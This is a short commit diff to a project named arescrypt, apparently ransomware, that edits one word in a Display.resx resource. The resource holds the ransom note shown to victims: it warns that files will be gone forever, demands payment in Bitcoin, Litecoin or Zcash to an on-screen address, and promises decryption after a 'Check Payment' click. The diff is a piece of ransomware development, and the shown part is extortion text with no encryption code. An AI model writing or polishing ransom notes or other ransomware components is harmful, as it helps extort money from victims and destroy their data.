Changed minor code

--- a/arescrypt/Display.resx
+++ b/arescrypt/Display.resx
@@ -134,7 +134,7 @@ YES! You just don't have enough time. You may pay in Bitcoins, Litecoin, or Zcas
 will be gone forever.
 
 How do I pay?
-You pay in the 3 payments posted. For more information please vist your coins website. Please send the correct 
+You can pay in the 3 payments posted. For more information please vist your coins website. Please send the correct 
 amount to the addess on the screen. After you have paid, please click on &lt;Check Payment&gt; Once the payment is checked,
 you can start decrypting your files! 
 
